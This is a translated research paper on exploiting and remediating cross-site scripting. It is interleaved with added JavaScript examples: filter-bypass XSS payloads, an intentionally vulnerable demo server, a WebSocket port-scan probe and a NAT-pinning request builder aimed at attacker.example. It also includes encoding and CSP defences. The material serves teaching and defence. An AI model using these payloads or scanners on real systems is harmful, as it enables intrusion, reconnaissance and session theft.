Eng. Nguyen Ngoc Quan, Information Security Research and Development Center

Abstract: XSS (cross-site scripting) is a web application vulnerability in which an end user can mount an attack by injecting into dynamic websites (ASP, PHP, CGI, JSP, ...) HTML tags or dangerous script fragments that can harm other users. XSS vulnerabilities have existed for a long time, yet today's scenarios can still be carried out with new kinds of attacks in the future. This paper presents an in-depth study of the danger of XSS vulnerabilities and of how they are exploited; it also introduces measures for remediating XSS attacks.

1. INTRODUCTION

With the advent of dynamic web development technologies, and with the ever-increasing use of web applications, the Web has also acquired more vulnerabilities. Cross-site scripting (abbreviated CSS, or more commonly XSS) is one of the most common injection attacks. XSS is an injection-based vulnerability found in web applications in which malicious code is injected through input variables as the payload. When a legitimate user visits an infected web application, the malicious code is echoed back to the user's browser. The injected code can read, modify and transmit sensitive data accessible through the browser, such as cookies and session tokens.

XSS (Cross-site Scripting (XSS) - OWASP) is a vulnerability that has existed for a long time. A more detailed view of XSS can be found in (Shanmugam & Ponnavaikko, 2008). XSS is one of the vulnerabilities in the annual OWASP Top 10. This paper focuses mainly on exploiting XSS, that is, on the attacks that can be carried out once an XSS vulnerability has been found, or in combination with exploitation tools. The paper first presents the basic features of XSS, some common ways of detecting XSS, and tools for exploiting XSS vulnerabilities, in Section 2. In Section 3 it describes the types of XSS: non-persistent or reflected vulnerabilities; stored or persistent vulnerabilities; DOM-based or local XSS. Section 4 describes a number of new and interesting security vulnerabilities found on websites recently and how they can be exploited. In Section 5 the paper lists a few remediation measures that can be implemented on the server side as well as on clients to protect a website or application from XSS vulnerabilities, and finally concludes.

2. RESEARCH CONTENT

Here the paper presents a brief analysis of the various popular frameworks that exist for detecting XSS vulnerabilities in web applications, and of how to exploit them. They work by injecting payloads and running scripts against the vulnerable website.

2.1. Xenotix
Xenotix (Abraham, 2012) is basically a penetration testing tool used to exploit XSS. It has a built-in payload list of more than 450 XSS payloads, which can bypass the basic XSS filters used by web developers. The payloads can be used manually or in automatic mode. It can also act as a keylogger, recording the keystrokes made by the user while visiting the infected page. The attacker can also download a malicious executable onto the user's system without the user being aware of it. When the user visits the infected page, the Java applet client.jar gains access to the command window of their system. The attacker uses the echo command to write a script named winconfig.vbs into the %temp% directory; cmd.exe then runs winconfig.vbs, which downloads the malicious executable specified by the attacker in the URL into the temp directory, renames it update.exe, and finally executes update.exe. Another exploit provided by Xenotix is installing a reverse shell (Hammer, 2006) on the user's system to gain access to their computer.

Although a simple tool, it is one worth attention. The keylogging feature is not persistent and can only capture keystrokes inside the infected page, and the drive-by download runs only 16-bit .exe files.

2.2. XSSF

XSSF is described in detail in (Tomes, 2011) and (xssf - Cross-Site Scripting Framework - Google Project Hosting); it aims to demonstrate the real dangers associated with XSS vulnerabilities. Its basic job is to create a communication channel (called an XSSF tunnel) with the target browser (one exposed to an XSS vulnerability) in order to carry out various attacks. The attacker can perform different attacks, each of which lives in its own module. A large number of modules, such as file stealer, iPhone Skype call, network scanning and many other exploits, can be used against these web application vulnerabilities. XSSF basically works by creating the tunnel and listing the ids of all victims who land on a page with an XSS vulnerability. The attacker then inspects the user's browser, looks for a suitable exploit, runs it and obtains a session on the user. After that the attacker can access the user's system. The XSS attacks that can be carried out include creating an XSSF tunnel that gives the attacker access to the local servers of the remote machine and lets him use their functionality. Because XSSF is integrated with the Metasploit console (Offensive Security Ltd, 2012), one can exploit any browser, via an XSS-vulnerable web page, to obtain a Meterpreter session on it and thereby system access. Another feature of the tool is XSSF auto-attack, in which various exploits can be added to a queue, each with its own job id, and executed automatically once the victim visits the vulnerable link supplied by the attacker.

On one hand XSSF offers many excellent features as a successful tool for post-XSS attacks; on the other hand it does not provide many means of detecting XSS vulnerabilities. Working with the XSSF framework also requires an understanding of Metasploit.

2.3. BeEF

BeEF stands for Browser Exploitation Framework. It is a powerful penetration testing tool for web browsers. It uses various client-side vectors to assess the actual security posture of the target environment. The framework comprises various command modules, and its simple, powerful API contributes to effective assessment. It allows modules to be developed quickly and used easily. BeEF hooks one or more web browsers to launch command modules, directing attacks against the system from inside the browser. Different browsers may sit in different security contexts, and each context may offer a distinct set of attack vectors. The framework lets the penetration tester select specific modules (in real time) to target each browser, and in each context. The BeEF framework is a powerful tool that can use XSS vulnerabilities to launch various attacks, a few of which are listed here: browser fingerprinting (gathering information about the browser), persistence, network fingerprinting, DNS enumeration, port scanning and IRC NAT pinning.
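The payload lists of Section 2.1 exist because developers keep writing blacklist filters. The following is an added example (not code from the paper, Xenotix, XSSF or BeEF): two constructed blacklist filters of the kind a developer might write, run against a handful of classic payloads, with a rough check for whether active content survived. Filters, payloads and the heuristic are all constructed for the demo.

```javascript
// Added example (not from the paper or from Xenotix): why a payload list matters.
// Two blacklist-style filters a developer might write, evaluated against a few
// classic payloads. Everything here is constructed for the demonstration.

// Filter 1: strips the literal tags <script> and </script> once, case-sensitively.
function naiveFilter(input) {
  return input.replace(/<script>/g, '').replace(/<\/script>/g, '');
}

// Filter 2: strips any <script ...> or </script> tag, case-insensitively, and
// repeats until nothing changes, so nested fragments cannot rebuild a tag.
function iterativeFilter(input) {
  let current = input;
  let previous;
  do {
    previous = current;
    current = current.replace(/<\/?script\b[^>]*>/gi, '');
  } while (current !== previous);
  return current;
}

// Rough check for whether something executable is left: a script tag, an inline
// event handler, or a javascript: URL. A heuristic for the demo, not a parser.
function containsActiveContent(html) {
  return /<script\b|\bon[a-z]+\s*=|javascript:/i.test(html);
}

// Constructed payloads, in the spirit of a Xenotix-style list.
const PAYLOADS = [
  '<script>alert(1)</script>',                   // the textbook payload
  '<ScRiPt>alert(1)</ScRiPt>',                   // defeats case-sensitive matching
  '<scr<script>ipt>alert(1)</scr</script>ipt>',  // defeats a single-pass strip
  '<img src=x onerror=alert(1)>',                // no script tag at all
  '<svg onload=alert(1)>',
  '<a href="javascript:alert(1)">click</a>',
];

// Run every payload through a filter and report which ones get through.
function evaluateFilter(filter, payloads = PAYLOADS) {
  const bypassed = payloads.filter((p) => containsActiveContent(filter(p)));
  return { blocked: payloads.length - bypassed.length, bypassed };
}

console.log('naive    :', evaluateFilter(naiveFilter));
console.log('iterative:', evaluateFilter(iterativeFilter));
```

The second filter is already more careful than most, and it still lets the three payloads that never use a script tag through: a blacklist can only ever describe what the author has seen. That is the gap a 450-entry payload list is built to find, and it is why the remediation section of this paper relies on output encoding rather than on stripping.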
3. TYPES OF XSS ATTACKS

There are currently three common types of cross-site scripting attack: non-persistent or reflected vulnerabilities (reflected or non-persistent cross-site scripting); stored or persistent vulnerabilities; and DOM-based or local XSS. The vulnerabilities found on different websites or web applications can be classified into these three types. They are explained and described in detail as follows.

Figure 1. Reflected or non-persistent cross-site scripting

Non-persistent attacks (Figure 1) occur when data supplied by a web client is used immediately by server-side scripts to generate a result page for that user. If the user-supplied data is not validated and is included in the result page without HTML encoding, client-side code can be injected into the dynamic page. The injected code may be reflected off the web server in a search result, an error message, or any other response that includes part of the input sent to the server as part of the request. Reflected attacks can be delivered to the user through another route, such as a notification e-mail, or possibly from some other web server. When a user is tricked into clicking a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the victim's browser. The browser then executes the code because it came from a "trusted" server.

Figure 2. Stored or persistent vulnerability

Stored or persistent vulnerabilities (Figure 2) allow the most powerful attacks: the malicious code is submitted to a website, where it is stored for a period of time (in a database, a file system, or elsewhere) and later displayed to users on a page of the site without being encoded with HTML entities. An example of such a situation is an online message board, where users are allowed to post HTML-formatted messages for other users to read.

Figure 3. DOM-based or local XSS

In DOM-based (Document Object Model) or local XSS (Figure 3), the attacker's data is embedded on the client side, from within some page served by the web server. For example, if a piece of JavaScript reads the request parameters from the URL and writes some HTML into its own page, using that information without encoding it with HTML entities, an XSS vulnerability can arise, because the written data is re-interpreted by the browser as HTML, which may include additional client-side script.
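To make the three classes concrete, here is an added example (not from the paper): a miniature web application whose pages reproduce the reflected, stored and DOM-based cases, driven from Node.js without a browser. The host name shop.example, the pages, the "database" array and the payload are constructed for the demo; the DOM-based page's client-side script is re-implemented as a plain function so its effect can be observed outside a browser.

```javascript
// Added example, not part of the paper: one toy server, three XSS classes.
// The pages deliberately echo and store input without HTML encoding, because
// that is the defect Section 3 describes. All names and data are constructed.

const PAYLOAD = '<script>alert(document.cookie)</script>';

const messageBoard = []; // stands in for the database behind the message board
const serverLog = [];    // the request lines the server actually receives

function serverHandle(url) {
  const u = new URL(url);
  // A browser never sends the #fragment to the server, so only path+query is logged.
  serverLog.push(`${u.pathname}${u.search}`);
  switch (u.pathname) {
    case '/search':  // reflected: the query parameter goes straight back in the response
      return `<p>Results for: ${u.searchParams.get('q') ?? ''}</p>`;
    case '/post':    // stored, step 1: the message is persisted
      messageBoard.push(u.searchParams.get('msg') ?? '');
      return '<p>Posted.</p>';
    case '/board':   // stored, step 2: every later reader receives the persisted message
      return `<ul>${messageBoard.map((m) => `<li>${m}</li>`).join('')}</ul>`;
    case '/welcome': // DOM-based: the page is static; its own script writes the fragment into the DOM
      return '<h1>Welcome</h1><script>document.write(decodeURIComponent(location.hash.slice(1)))</script>';
    default:
      return '<p>Not found</p>';
  }
}

// What the /welcome script does inside the victim's browser, re-implemented for Node:
// read the fragment and return the string document.write() would insert.
function clientRenderWelcome(url) {
  return decodeURIComponent(new URL(url).hash.slice(1));
}

function demoReflected() {
  const link = `https://shop.example/search?q=${encodeURIComponent(PAYLOAD)}`; // the link the victim clicks
  return serverHandle(link).includes(PAYLOAD); // true: the payload is in the response immediately
}

function demoStored() {
  serverHandle(`https://shop.example/post?msg=${encodeURIComponent(PAYLOAD)}`); // attacker posts once
  return serverHandle('https://shop.example/board').includes(PAYLOAD);       // true: any reader gets it
}

function demoDomBased() {
  const link = `https://shop.example/welcome#${encodeURIComponent(PAYLOAD)}`;
  serverLog.length = 0;
  const response = serverHandle(link);         // the server returns the same static page as always
  const rendered = clientRenderWelcome(link);  // the browser-side script inserts the payload
  return {
    serverSawPayload: serverLog.some((line) => line.includes('script')), // false: it never left the browser
    responseHasPayload: response.includes(PAYLOAD),                        // false
    domHasPayload: rendered.includes(PAYLOAD),                             // true
  };
}

console.log('reflected:', demoReflected());
console.log('stored   :', demoStored());
console.log('DOM-based:', demoDomBased());
```

The DOM-based case is the one worth staring at: the server log never contains the payload, so a server-side filter or WAF has nothing to inspect, and the only place the defect can be fixed is the client-side script itself.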
4. ATTACKS EXPLOITING XSS

4.1. Data stealing vulnerability on Android

The vulnerability explained here (Cannon, 2013) exists in the Android 2.2 framework. It can be exploited to access files stored on the SD card of devices running Android. The Android browser does not prompt the user when downloading a file; for example, a file such as "payload.html" is downloaded automatically to /sdcard/download/payload.html. JavaScript can then be used to open the "payload" file automatically, which makes the browser render the local file and, in that context, lets its code access the SD card and the files stored on it. It can then send the contents of the accessed files back to the vulnerable website. The exploit simply uses JavaScript and redirects, so it can be used on many handsets and on different versions of Android. It also has a few limitations: the name and path of the file to be accessed must be known in advance, and since it is not a root vulnerability it cannot access every file, only what is stored on the SD card.

4.2. Skype's improper URI scheme and embeddable WebKit browser on iOS

This vulnerability, as explained in (Kumar, 2011), (Purviance, 2011) and (iPhones Make Automatic Skype Calls | Security Generation, 2010), exists in the iOS framework. It can be exploited by an attacker to access the user's SQLite Address Book database and also to place calls directly using Skype. The Skype application developed for iOS uses a locally stored HTML file to display chat messages from other Skype users, but it fails to encode the "Full Name" of incoming users, allowing an attacker to execute malicious JavaScript when the victim views the message. The exploit is carried out through the embedded WebKit browser. In addition, the Skype developers set the URI scheme of the embedded browser to "file://", allowing the attacker to access the file system and read any file readable by the sandboxed iOS application. Going forward, third-party applications should be restricted from performing actions triggered by URLs, since the URI scheme lets a web page embed an iframe that forces Skype to open (if it is installed) and call a specific number: <iframe src="skype://1900expensivepremiumnumber?call"></iframe>.

4.3. HTML5 API for cross-domain calls

This vulnerability can only be exploited on Windows systems. HTML5 has two APIs for making cross-domain calls: Cross-Origin Requests and WebSockets. Using them, JavaScript can create connections to any IP and any port (apart from blocked ports), which makes them an ideal candidate for port scanning. The APIs can be exploited to determine whether the port being connected to is open, closed or filtered. This is done with the help of two properties: 'readyState', which indicates the status of the connection at a given moment, and the 'time duration' for which the connection stays in each readyState value. By observing the differences in behaviour we can determine the nature of the ports. Since this is an application-layer scan, its success also depends on the nature of the application running on the target port. Some applications, when a request is sent to them, simply keep the socket open and stay silent, perhaps waiting for more input or for input in a specific format. If the target is running such an application, its state cannot be determined. Even though the port state cannot always be determined, the technique can be extended to perform network scanning as well as internal IP detection.
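The readyState/timing inference above, as an added example that is not from the paper or from the original research it summarises: a browser-side probe that times how long a WebSocket stays in CONNECTING, and a pure classifier that turns that timing into open/closed/undecidable. The thresholds are assumptions to be calibrated per browser and operating system (the text itself notes the behaviour is platform-dependent), and the timing samples at the bottom are constructed, not measured.

```javascript
// Added example, not from the paper: the readyState/timing inference of Section 4.3,
// split into a browser-side probe and a pure classifier so the decision logic can
// run without a network. Thresholds are assumptions; samples are constructed.

// Assumed behaviour: any listening service makes the handshake fail quickly; a refused
// connection is reported noticeably later; a filtered port, or a service that waits
// silently for input, leaves the socket in CONNECTING until our own timeout.
const DEFAULT_THRESHOLDS = { openMaxMs: 100, timeoutMs: 5000 };

// WebSocket readyState values: 0 CONNECTING, 1 OPEN, 2 CLOSING, 3 CLOSED.
function classifyPort(elapsedMs, finalReadyState, t = DEFAULT_THRESHOLDS) {
  if (finalReadyState === 1) return 'open';             // a genuine WebSocket endpoint
  if (elapsedMs >= t.timeoutMs) return 'open|filtered'; // the undecidable case the text describes
  if (elapsedMs < t.openMaxMs) return 'open';           // something answered, handshake failed fast
  return 'closed';                                      // connection refused, reported after a delay
}

// Browser-side probe: open ws://host:port and time how long readyState stays 0.
// Needs a WebSocket implementation (a browser, or Node 22+) and a network, so it is
// only defined here and never called in this file.
function probePort(host, port, t = DEFAULT_THRESHOLDS) {
  return new Promise((resolve, reject) => {
    if (typeof WebSocket === 'undefined') {
      reject(new Error('no WebSocket implementation available'));
      return;
    }
    const started = Date.now();
    const ws = new WebSocket(`ws://${host}:${port}/`);
    let settled = false;
    const finish = (timedOut) => {
      if (settled) return;
      settled = true;
      const measured = Date.now() - started;
      const elapsedMs = timedOut ? Math.max(measured, t.timeoutMs) : measured;
      resolve({ port, elapsedMs, readyState: ws.readyState, verdict: classifyPort(elapsedMs, ws.readyState, t) });
    };
    ws.onopen = () => finish(false);
    ws.onerror = () => finish(false);
    ws.onclose = () => finish(false);
    setTimeout(() => { finish(true); try { ws.close(); } catch (_) { /* already closed */ } }, t.timeoutMs);
  });
}

// Constructed samples: what probePort() might return against one LAN host.
const SAMPLE_TIMINGS = [
  { port: 80,   elapsedMs: 12,   readyState: 3 }, // web server rejected the upgrade at once
  { port: 22,   elapsedMs: 40,   readyState: 3 }, // sshd sent its banner and hung up
  { port: 8080, elapsedMs: 9,    readyState: 1 }, // a real WebSocket service
  { port: 81,   elapsedMs: 1020, readyState: 3 }, // nothing listening: refused, reported late
  { port: 3306, elapsedMs: 5000, readyState: 0 }, // mysqld waits silently for a client packet
  { port: 445,  elapsedMs: 5000, readyState: 0 }, // dropped by a host firewall
];

function classifyScan(samples, t = DEFAULT_THRESHOLDS) {
  const verdicts = {};
  for (const s of samples) verdicts[s.port] = classifyPort(s.elapsedMs, s.readyState, t);
  return verdicts;
}

console.log(classifyScan(SAMPLE_TIMINGS));
```

Before trusting any verdict, run probePort() against one port you know is open and one you know is closed on the same host and set openMaxMs between the two measurements; the two timeout samples show why the scan can only ever say "open or filtered" for a service that answers nothing.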
4.4. HTML5 implementation of AJAX history

HTML5 has a feature that lets the user visit different pages and links within a site without the URL changing. It is implemented with the help of the window.history.pushState() function. It was created so that AJAX sites could easily modify the address bar and manipulate the browser history. It is a great and convenient feature for developers; for example, AJAX applications can easily support the back and forward buttons without resorting to fragment identifiers (#) in the URI. But it can also be exploited on a site with an XSS vulnerability, since it lets the attacker redirect the user to any link without changing the URL in the address bar.

4.5. Access to the WScript ActiveX control in Internet Explorer

The security settings in Internet Explorer allow access to the WScript ActiveX control through scripting languages such as JavaScript and VBScript. The sample application shows how to use the "WScript.Shell" ActiveX object to interact with the client machine. With this control one can execute commands just as at a command prompt, without notifying the user. Through the shell one can also create, delete and modify text files via WScript.FileSystemObject. IE7 introduced a new security control called "Access data sources across domains", which by default is set to prompt the user whether to allow a script to talk to other domains (it treats the file system as a separate domain), but one can write a script file directly to disk and then execute it, getting around the IE7 controls.

4.6. File API in HTML5

This vulnerability is currently present in WebKit (the latest Google Chrome) and can be exploited to turn the Google Chrome browser into a file server. The File API in HTML5 lets JavaScript access files once they have been selected by the user (i.e., before they are uploaded). Besides providing a better file-upload experience, it can also be used maliciously to steal your files in an XSS attack. With clever styling you can hide the input type=file control so the user does not realise that he is about to upload files. In that case only the files selected by the user in the 'Open File' dialog can be accessed. However, the directory-selection variant of input type=file is a great feature that lets the user upload the contents of a selected folder, thus giving the attacker access to the whole directory.

4.7. XSS MAP

While collecting data for Google Street View, Google also collected data about wireless networks in the vicinity and the MAC addresses of routers, then mapped them to GPS coordinates. Here, as described in (Higgins, 2010), an XSS exploit can be used to map the user's location. The XSS exploit obtains the MAC address of the target's router and then uses Google Maps to determine the GPS coordinates. A malicious page you are visiting can run an XSS exploit and recover your GPS coordinates from Google Maps. Routers and web browsers themselves contain no geolocation/GPS data, and this is not IP-based geolocation. It works through a router XSS that obtains the router's MAC address via AJAX. The MAC address is then sent to the attacker, who forwards it to Google's location-based service, which can map the user's location (approximate GPS coordinates) from that MAC address.

4.8. NAT pinning: IRC over HTTP

In this XSS attack, a web page forces the user's router or firewall, without their knowledge, to forward any port back to the user's machine. When the victim clicks an XSS-vulnerable URL that contains a hidden form pointed at http://attacker.com:6667 (the IRC port), the user submits the form without knowing it. An HTTP connection is thus made to the attacker's "IRC server" (a fake one), which simply listens. The victim's router sees an "IRC connection" (even though the client is speaking HTTP) and an attempt at a 'DCC Chat'. Direct Client-to-Client (DCC) is an IRC-related sub-protocol that allows file exchange and non-relayed chats by letting peers connect directly to each other, using an IRC server for the handshake signalling. DCC Chat requires opening a local port on the client machine to which the reverse connection is made. Although the router blocks all inbound connections, it decides to forward traffic on the DCC Chat port back to the victim's machine, allowing NAT traversal so the attacker can connect back and chat with him. However, the attacker has chosen the port: for example port 21 (FTP), in which case the router forwards port 21 back to the victim's internal system. The attacker then has a clear path to connect to the victim on port 21 and launch an attack.
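The request the hidden form above produces, and what a router-side IRC helper would make of it, as an added example (not from the paper; the technique itself was published as "NAT pinning" by Samy Kamkar in 2010). The host name attacker.example, the nick, the addresses and the multipart boundary are constructed. The DCC CHAT syntax is the standard IRC CTCP form "DCC CHAT chat <ip-as-integer> <port>". Assumed about the router: its IRC connection-tracking helper scans the byte stream to port 6667 for that tag and honours it only when the embedded IP equals the connection's source address (Linux's nf_conntrack_irc behaves that way), so the victim's real internal IP must be used; Section 4.3 covers how to learn it.

```javascript
// Added example, not from the paper: the POST a hidden form produces for NAT pinning
// and what an IRC connection-tracking helper on the router extracts from it.
// Host, nick, addresses and boundary are constructed for the demo.

const ATTACKER_HOST = 'attacker.example'; // stands in for attacker.com in the text
const IRC_PORT = 6667;

// IRC DCC carries IPv4 addresses as a big-endian 32-bit integer written in decimal.
function ipToLong(ip) {
  return ip.split('.').reduce((acc, octet) => acc * 256 + Number(octet), 0);
}
function longToIp(n) {
  return [24, 16, 8, 0].map((shift) => (n >>> shift) & 255).join('.');
}

// The CTCP DCC CHAT request exactly as a real IRC client would send it to a peer.
function dccChatLine(nick, internalIp, port) {
  return `PRIVMSG ${nick} :\x01DCC CHAT chat ${ipToLong(internalIp)} ${port}\x01`;
}

// multipart/form-data keeps field values byte for byte, so the \x01 bytes survive.
function multipartBody(fields, boundary) {
  let body = '';
  for (const [name, value] of Object.entries(fields)) {
    body += `--${boundary}\r\nContent-Disposition: form-data; name="${name}"\r\n\r\n${value}\r\n`;
  }
  return `${body}--${boundary}--\r\n`;
}

// The HTTP request the victim's browser makes when the hidden form auto-submits.
function buildPinningRequest(victimInternalIp, targetPort, boundary = '----demo7f3a') {
  const body = multipartBody({ x: dccChatLine('attacker', victimInternalIp, targetPort) }, boundary);
  return {
    method: 'POST',
    url: `http://${ATTACKER_HOST}:${IRC_PORT}/`,
    headers: {
      'Content-Type': `multipart/form-data; boundary=${boundary}`,
      'Content-Length': String(new TextEncoder().encode(body).length),
    },
    body,
  };
}

// What the router's IRC helper sees: it does not parse HTTP at all; it scans the
// bytes headed for port 6667 for a DCC tag and, if found, opens a pinhole to ip:port.
function ircHelperView(stream) {
  const m = stream.match(/\x01DCC CHAT \S+ (\d+) (\d+)\x01/);
  if (!m) return null;
  return { ip: longToIp(Number(m[1])), port: Number(m[2]) };
}

const req = buildPinningRequest('192.168.1.2', 21);
console.log(req.headers);
console.log(ircHelperView(req.body)); // { ip: '192.168.1.2', port: 21 }
```

Two practical caveats: current browsers refuse to connect to port 6667 at all (it is on the list of blocked ports the text alludes to), and the helper only opens the pinhole if the IP inside the DCC tag is the real source of the connection, so a guessed internal address produces nothing.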
4.9. Browser exploits

Anyone can exploit the browser's application stack and run shellcode or open a Meterpreter session by using a memory-corruption bug in conjunction with an XSS vulnerability. Other vulnerabilities can also return a Meterpreter session without attacking the application stack directly; for example, a Java applet can be used to download malicious code and execute an .exe file.

5. XSS REMEDIATION

In today's world, web applications are widely used to provide various online services. At the same time, application vulnerabilities are being discovered and disclosed at an alarming rate. In a world where web security can easily be breached, security becomes mandatory in order to protect oneself from attacks. Various measures can be applied to avoid becoming a victim of XSS. The prevention mechanisms (XSS (Cross Site Scripting) Cheat Sheet - OWASP, 2013) can be implemented either on the server side or on the client side.

5.1. Server-side protection

To protect against XSS vulnerabilities, the following measures can be taken by developers on the server side. The basic principle is: do not trust user-supplied input (including cookies). It must be validated and verified before it is allowed into the application. Protection can be achieved by restricting the domains and paths that accept cookies, setting flags such as HttpOnly, using SSL, and never storing secret data in cookies. Scripts coming from client-supplied content can be safely disabled. The Content Security Policy header can also be used to protect against exploitation of XSS vulnerabilities. In addition, HTML, JavaScript, CSS and URL control characters should be properly encoded so that they are harmless before they are displayed in the browser. Use filters to sanitise user input: FILTER_SANITIZE_ENCODED (URL encoding), htmlentities() (HTML encoding), FILTER_SANITIZE_MAGIC_QUOTES (applies addslashes()). These filters keep watch on user input, check for JavaScript or HTTP POST data in the input, and then prevent the scripts from executing. Besides these measures there are several security libraries available for encoding user input, such as the OWASP Encoding Project available on Google Code, HTML filters such as htmLawed for PHP, the Anti-XSS Class, the AntiSamy API for .NET, and the XSS-HTML-Filter for Java.
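The server-side measures of Section 5.1, as an added example written for Node.js rather than the PHP filters the text names (it is not code from the paper or from any of the libraries it lists). It shows context-specific output encoders, the reflected search page from Section 3 in its vulnerable and hardened forms, and the cookie flags and Content Security Policy header the section recommends. The page layout, cookie value, nonce and payload are constructed for the demo.

```javascript
// Added example, not from the paper: Section 5.1's measures in Node.js.
// Names, page layout, cookie value, nonce and payload are constructed.

// 1. Output encoding chosen by the context the untrusted value lands in.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
function encodeForHtml(s) {        // element content and quoted attribute values
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}
function encodeForJsString(s) {    // inside a quoted string literal in a <script> block
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? `\\x${code.toString(16).padStart(2, '0')}`
      : `\\u${code.toString(16).padStart(4, '0')}`;
  });
}
function encodeForCssString(s) {   // inside a quoted CSS string, e.g. url("...")
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `\\${c.charCodeAt(0).toString(16)} `);
}
const encodeForUrlParam = encodeURIComponent; // a value placed into a query string

// 2. The reflected search page: vulnerable rendering beside the hardened one.
function renderSearchUnsafe(query) {
  return `<p>Results for ${query}</p>
<script>var q = "${query}";</script>
<a href="/search?q=${query}">search again</a>`;
}
function renderSearchSafe(query, nonce) {
  // The href gets two layers: URL-encoded for the query string, then HTML-encoded
  // because it sits inside an attribute. The script tag carries the CSP nonce.
  return `<p>Results for ${encodeForHtml(query)}</p>
<script nonce="${encodeForHtml(nonce)}">var q = "${encodeForJsString(query)}";</script>
<a href="/search?q=${encodeForHtml(encodeForUrlParam(query))}">search again</a>`;
}

// 3. Cookie and header hardening from the same section.
function sessionCookie(value) {
  // HttpOnly keeps script away from it, Secure keeps it off plain HTTP, Path limits where it is sent.
  return `session=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly`;
}
function contentSecurityPolicy(nonce) {
  // Only same-origin scripts and the one inline block carrying this nonce may run,
  // so an injected <script> is refused by the browser even where encoding was missed.
  return `default-src 'self'; script-src 'self' 'nonce-${nonce}'; object-src 'none'; base-uri 'self'`;
}
function securityHeaders(sessionValue, nonce) {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy': contentSecurityPolicy(nonce),
    'Set-Cookie': sessionCookie(sessionValue),
  };
}

const PAYLOAD = '"><script>alert(document.cookie)</script>';
const NONCE = 'demo-nonce-0001'; // in production: fresh random bytes for every response
console.log(renderSearchUnsafe(PAYLOAD));
console.log(renderSearchSafe(PAYLOAD, NONCE));
console.log(securityHeaders('s3ss10n', NONCE));
```

The point of having four encoders rather than one "sanitize" function is that the same string is harmless or lethal depending on where it is written: htmlentities() on a value that ends up inside a JavaScript string does nothing about a closing quote, and a value inside an href needs the URL layer first and the HTML layer second. The CSP is the backstop for the place the developer forgot.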
5.2. Endpoint protection

Users can take steps to avoid becoming victims of cross-site scripting by installing various browser add-ons. These add-ons keep watch over the various input fields (forms, URLs, etc.); if JavaScript or an HTTP POST is encountered, they apply XSS filters to prevent those scripts from executing. Examples of such add-ons include NoScript for Firefox and NotScripts for Chrome and Opera, while Internet Explorer 8 has this as a built-in feature.
6. CONCLUSION

... an integral part of our lives. But these websites often contain many vulnerabilities and are easy to attack. This paper explored one of the most commonly found vulnerabilities and showed how it is exploited. XSS is an injection attack that can form the basis of very powerful exploits. It can often be combined with other vulnerabilities to carry out even more serious attacks. In this paper we discussed a few common attacks. We listed a few XSS detection and exploitation tools, together with their main features. Furthermore, we covered some of the latest XSS vulnerabilities and attacks and explained the concepts behind them. In conclusion we listed a few protection mechanisms that can be implemented on either the server or the client to protect against XSS attacks.

Author information:

REFERENCES:
2. Abraham, A. (2012). Detecting and Exploiting XSS with Xenotix XSS Exploit Framework.
3. Cannon, T. (2013, November 23). Android Data Stealing Vulnerability. thomascannon.net.
4. Cross-site Scripting (XSS) - OWASP. (n.d.). Retrieved February 2013, from www.owasp.org.